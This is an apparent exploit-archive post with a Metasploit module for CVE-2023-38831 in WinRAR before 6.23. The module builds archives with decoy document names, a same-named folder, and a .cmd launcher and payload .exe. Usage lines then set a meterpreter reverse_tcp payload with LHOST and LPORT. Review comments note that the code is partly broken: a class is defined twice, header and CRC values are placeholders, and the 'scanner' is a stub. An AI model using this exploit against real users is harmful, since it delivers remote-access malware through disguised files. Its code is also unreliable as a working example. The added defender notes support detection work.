=============================================================================================================================================
| # Title : WinRAR 6.22 and earlier - Logical Flaw in File ExtractionExploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.win-rar.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831

[+] Summary : This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability allows attackers to create specially crafted ZIP archives that, when opened, execute arbitrary code by exploiting the file extraction logic when a user double-clicks on a file within the archive that has an embedded folder with the same name.

[+] POC :

---

##
# Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction
# Author: indoushka
# CVE-2023-38831
##

# Metasploit file-format module for CVE-2023-38831. It writes one archive to
# FILENAME containing (1) a decoy entry, (2) a directory entry with the same
# name plus a trailing separator, and (3) a .cmd script and a payload .exe
# inside that directory. The advisory above attributes the flaw to the
# extractor's handling of that name collision in WinRAR versions before 6.23.
#
# Defender notes: archive members whose names differ only by a trailing
# "\" or "/", with .cmd/.exe members placed under a document-named directory,
# are the structural indicator of this technique and are cheap to flag in
# archive inspection; the advisory's version boundary implies updating WinRAR
# to 6.23 or later as the mitigation.
#
# NOTE(review): a second `class MetasploitModule < Msf::Auxiliary` is defined
# further down in this same file. Ruby raises a superclass-mismatch TypeError
# when a class is reopened with a different parent, so loading this file as a
# single module is expected to fail; the scanner belongs in its own file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  # Registers module metadata and the three datastore options.
  #
  # FILENAME   - output archive name consumed by file_create (default exploit.rar)
  # DECOY_NAME - name used for the decoy entry and for the colliding directory
  # HIDEEXE    - registered here but never read anywhere else in this file
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WinRAR CVE-2023-38831 Logical Flaw Exploit',
      'Description' => %q{
        This module exploits a logical flaw in WinRAR versions before 6.23.
        The vulnerability allows attackers to create specially crafted ZIP archives that,
        when opened, execute arbitrary code by exploiting the file extraction logic
        when a user double-clicks on a file within the archive that has an embedded
        folder with the same name.
      },
      'Author' => [
        'indoushka', # Metasploit module
        'E1.Coders' # Original research
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2023-38831'],
        ['URL', 'https://www.rarlab.com/rarnew.htm'],
        ['URL', 'https://news.ycombinator.com/item?id=37135383']
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'process',
        'DisablePayloadHandler' => false
      },
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Payload' => {
        'Space' => 4096,
        'BadChars' => "\x00",
        'DisableNops' => true
      },
      'Targets' => [
        [ 'Windows Universal (RAR <= 6.22)', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ]
      ],
      'Privileged' => false,
      'DisclosureDate' => '2023-08-23',
      'DefaultTarget' => 0))

    register_options([
      OptString.new('FILENAME', [true, 'The output file name', 'exploit.rar']),
      OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']),
      OptBool.new('HIDEEXE', [true, 'Hide executable extension', true])
    ])
  end

  # Builds the archive bytes with build_malicious_rar and writes them to
  # FILENAME via file_create. The zip-based builders defined further down
  # (create_zip_exploit, create_advanced_exploit) are not called from here or
  # from anywhere else in this file.
  def exploit
    # Generate payload executable
    pe_payload = generate_payload_exe

    # Create temporary directory for exploit construction
    # NOTE(review): temp_dir is created in the current working directory and
    # never referenced again; the modifier rescue silently hides any mkdir error.
    temp_dir = Rex::Text.rand_text_alpha(8)
    Dir.mkdir(temp_dir) rescue nil

    # Create decoy folder structure: the directory entry is the decoy name
    # followed by a trailing backslash; both inner members get random
    # 8-letter names under that directory.
    decoy_name = datastore['DECOY_NAME']
    folder_name = "#{decoy_name}\\"
    script_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd"
    exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"

    # Build the malicious archive
    rar_content = build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)

    # Create the final RAR file
    file_create(rar_content)

    print_status("Exploit archive created: #{datastore['FILENAME']}")
    print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute")
  end

  # Assembles the archive as a flat byte string: the 7-byte "Rar!\x1A\x07\x00"
  # signature, four entries emitted by build_file_header (decoy, directory,
  # script, exe) each followed by its data, then 12 zero bytes as the end marker.
  #
  # @param decoy_name [String] name of the first entry; its data is pe_payload
  # @param folder_name [String] decoy_name plus trailing backslash; zero-length entry
  # @param script_name [String] path of the .cmd member inside folder_name
  # @param exe_name [String] path of the .exe member inside folder_name
  # @param pe_payload [String] payload executable bytes (written twice)
  # @return [String] archive bytes
  def build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
    rar = ""

    # RAR file signature
    rar << "\x52\x61\x72\x21\x1A\x07\x00"

    # Build file entries using RAR format
    # First: The decoy file
    rar << build_file_header(decoy_name, pe_payload.length)
    rar << pe_payload

    # Second: The folder (trailing backslash)
    rar << build_file_header(folder_name, 0)

    # Third: The script file inside the folder
    script_content = build_script_content
    rar << build_file_header(script_name, script_content.length)
    rar << script_content

    # Fourth: The executable inside the folder
    rar << build_file_header(exe_name, pe_payload.length)
    rar << pe_payload

    # End of archive
    rar << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

    rar
  end

  # Emits one file-header record for the archive. All multi-byte integers are
  # packed little-endian ('v' = 16-bit, 'V' = 32-bit).
  #
  # NOTE(review): the header-size bytes and the file CRC are fixed placeholders
  # and are not computed from the name or data that follow; the existing
  # "(fake)" comment below documents this for the CRC.
  #
  # @param filename [String] entry name; also repeated in the trailing extra block
  # @param file_size [Integer] written as both compressed and uncompressed size
  # @return [String] header bytes
  def build_file_header(filename, file_size)
    header = ""

    # Header type (file header)
    header << "\x74"

    # Header size
    header << "\x3A\x00"

    # Flags (important for the exploit)
    flags = 0x8000 # Long filename
    flags |= 0x0100 # File has extended time field
    header << [flags].pack('v')

    # Compressed size
    header << [file_size].pack('V')

    # Uncompressed size
    header << [file_size].pack('V')

    # OS (Windows)
    header << "\x02"

    # File CRC (fake)
    header << "\x00\x00\x00\x00"

    # File time (current time), packed in the MS-DOS date/time layout:
    # bits 25+ year-1980, 21-24 month, 16-20 day, 11-15 hour, 5-10 minute,
    # 0-4 seconds/2.
    time = Time.now
    dos_time = ((time.year - 1980) << 25) | (time.month << 21) | (time.day << 16) |
               (time.hour << 11) | (time.min << 5) | (time.sec / 2)
    header << [dos_time].pack('V')

    # RAR version (5.0)
    header << "\x32\x00"

    # Method (store)
    header << "\x30"

    # Name size
    header << [filename.length].pack('v')

    # Attributes
    header << "\x20\x00\x00\x00" # Archive attribute

    # File name
    header << filename

    # Extra data for long filename: type 0x0001, a 16-bit size covering the
    # name plus its NUL terminator, then the name again.
    if filename.length > 0
      extra_size = 2 + filename.length + 1
      header << "\x01\x00" # Extra type (long filename)
      header << [extra_size].pack('v')
      header << filename
      header << "\x00"
    end

    header
  end

  # Returns a three-line Windows batch script. %~dp0 is cmd's expansion of
  # the running script's own drive and directory, so the script starts an
  # .exe located next to itself; the 8-letter name is generated within this
  # call.
  #
  # @return [String] batch script text with CRLF line endings
  def build_script_content
    # Create a script that executes the payload
    script = "@echo off\r\n"
    script << "start \"\" \"%~dp0#{Rex::Text.rand_text_alpha(8)}.exe\"\r\n"
    script << "exit\r\n"
    script
  end

  # Alternative method using RubyZip for more reliable ZIP creation
  # Builds the same four-member layout as a ZIP, using a forward slash as the
  # directory separator and the rubyzip gem (required lazily here). Not called
  # from anywhere in this file; zip_data is assigned but never used, and the
  # returned bytes are not written out by anything in this file.
  #
  # @return [String] ZIP bytes (the .string of the buffer returned by write_buffer)
  def create_zip_exploit
    require 'zip'

    zip_data = ""
    Zip::OutputStream.write_buffer do |zos|
      # Add decoy file
      zos.put_next_entry(datastore['DECOY_NAME'])
      zos.write(generate_payload_exe)

      # Add folder with trailing slash
      folder_name = "#{datastore['DECOY_NAME']}/"
      zos.put_next_entry(folder_name)

      # Add script inside folder
      script_name = "#{folder_name}script.cmd"
      zos.put_next_entry(script_name)
      zos.write(build_script_content)

      # Add executable inside folder
      exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
      zos.put_next_entry(exe_name)
      zos.write(generate_payload_exe)
    end.string
  end

  # Advanced: Create a more sophisticated exploit with multiple decoys
  # Repeats the same layout for each of four decoy names, with fixed inner
  # member names payload.exe and run.cmd and a one-line "@start payload.exe"
  # script. Also never called from this file, and unlike create_zip_exploit it
  # does not require 'zip' itself, so it depends on Zip already being loaded.
  #
  # @return [String] ZIP bytes
  def create_advanced_exploit
    print_status("Creating advanced WinRAR exploit...")

    # Use multiple file formats as decoys
    decoys = [
      "document.pdf",
      "invoice.docx",
      "photo.jpg",
      "spreadsheet.xlsx"
    ]

    zip_data = ""
    Zip::OutputStream.write_buffer do |zos|
      decoys.each do |decoy|
        # Add decoy file
        zos.put_next_entry(decoy)
        zos.write(generate_payload_exe)

        # Add folder for this decoy
        folder_name = "#{decoy}/"
        zos.put_next_entry(folder_name)

        # Add payload in folder
        exe_name = "#{folder_name}payload.exe"
        zos.put_next_entry(exe_name)
        zos.write(generate_payload_exe)

        # Add script to trigger execution
        script_name = "#{folder_name}run.cmd"
        zos.put_next_entry(script_name)
        zos.write("@start payload.exe\r\n")
      end
    end.string
  end
end

######### Auxiliary module for WinRAR vulnerability detection ############
# NOTE(review): reuses the class name MetasploitModule with a different
# superclass than the exploit class above (see the note there). It registers
# SMB-style options, but `run` below never reads any of them.
class MetasploitModule < Msf::Auxiliary
  # Registers metadata and the RHOSTS / SMB credential options.
  def initialize
    super(
      'Name' => 'WinRAR CVE-2023-38831 Vulnerability Scanner',
      'Description' => %q{
        This module scans for systems vulnerable to the WinRAR CVE-2023-38831
        vulnerability by checking WinRAR versions and testing exploitability.
      },
      'Author' => ['indoushka'],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2023-38831']
      ]
    )

    register_options([
      OptString.new('RHOSTS', [true, 'Target address range or CIDR identifier']),
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
      OptString.new('SMBUSER', [false, 'The username to authenticate as']),
      OptString.new('SMBPASS', [false, 'The password for the specified username']),
      OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication'])
    ])
  end

  # Prints a status line and returns. No connection is made and the datastore
  # is never consulted; vulnerable_versions is a local list (6.22 down to
  # 5.30) that nothing reads. The comments below describe intended behaviour,
  # not anything that is implemented.
  def run
    # Scan for WinRAR installations and check versions
    print_status("Scanning for vulnerable WinRAR installations...")

    # Implementation would connect to targets and check WinRAR versions
    # This is a simplified version - actual implementation would require
    # SMB connection and registry checks

    vulnerable_versions = [
      '6.22', '6.21', '6.20', '6.11', '6.10', '6.02', '6.01', '6.00',
      '5.91', '5.90', '5.80', '5.70', '5.60', '5.50', '5.40', '5.30'
    ]

    # For each target, check WinRAR version
    # If version <= 6.22, mark as vulnerable
  end
end

################ Usage Examples:

# Generate exploit with default settings
use exploit/windows/fileformat/winrar_cve_2023_38831
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

# Generate with custom decoy name
set DECOY_NAME invoice.pdf
exploit

# Generate without hiding executable
set HIDEEXE false
exploit

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================